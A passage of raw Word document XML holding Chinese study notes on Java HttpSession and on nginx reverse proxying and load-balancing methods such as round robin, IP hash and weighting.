          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>信息包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sessionId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。每次客户端访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时都会带上这个信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="009E3923">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HttpSession</w:t>
      </w:r>
      <w:r w:rsidR="00BF67AF">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BF67AF">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidR="00BF67AF">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="009E3923">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="009E3923">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="009E3923">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="009E3923">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="009E3923">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象概念的具体实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF67AF" w:rsidRDefault="00DF62FB" w:rsidP="00F37684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF62FB" w:rsidRPr="00F41A4C" w:rsidRDefault="00DF62FB" w:rsidP="00F37684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="2F2F2F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://docs.oracle.com/javaee/7/api/javax/servlet/http/HttpSession.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE4EFB" w:rsidP="001115B7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.8</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00EE184C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nginx</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>负载均衡</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="0036322E" w:rsidP="00B7162C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.8</w:t>
      </w:r>
      <w:r w:rsidR="00B7162C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nginx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C582A" w:rsidRPr="00EE7992" w:rsidRDefault="004C582A" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>反向代理（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Reverse Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方式是指以</w:t>
      </w:r>
      <w:hyperlink r:id="rId247" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="136EC2"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>代理服务器</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来接受</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上的连接请求，然后将请求转发给内部网络上的服务器，并将从服务器上得到的结果返回给</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上请求连接的客户端，此时代理服务器对外就表现为一个反向代理服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E727DC" w:rsidRDefault="00F37684" w:rsidP="00E727DC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidR="006F5465">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C582A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>高性能的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>和反向代理服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E727DC" w:rsidRDefault="00E727DC" w:rsidP="00E727DC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006806DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA75FE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>50000</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>个开发连接数的响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E727DC" w:rsidRDefault="00E727DC" w:rsidP="00E727DC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006806DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004C582A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>作为负载均衡服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B3487" w:rsidRPr="00F41A4C" w:rsidRDefault="00E727DC" w:rsidP="00E727DC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006806DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="002739F0" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r w:rsidR="002B3487" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>动态页面和静态页面分离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>还可以按照调度规则实现动态、静态页面的分离，可以按照</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>轮询、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>哈希、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>哈希、权重</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>等多种方式对后端服务器做负载均衡，同时还支持后端服务器的健康检查</w:t>
      </w:r>
      <w:r w:rsidR="00D52A48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">nginx </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="004D30C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>pstream</w:t>
      </w:r>
      <w:r w:rsidRPr="004D30C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>目</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>前支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>种方式的分配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、轮询（默认）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="005A4CD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>每个请求按</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>时间顺序</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>逐一分配到不同的后端服务器，如果后端服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
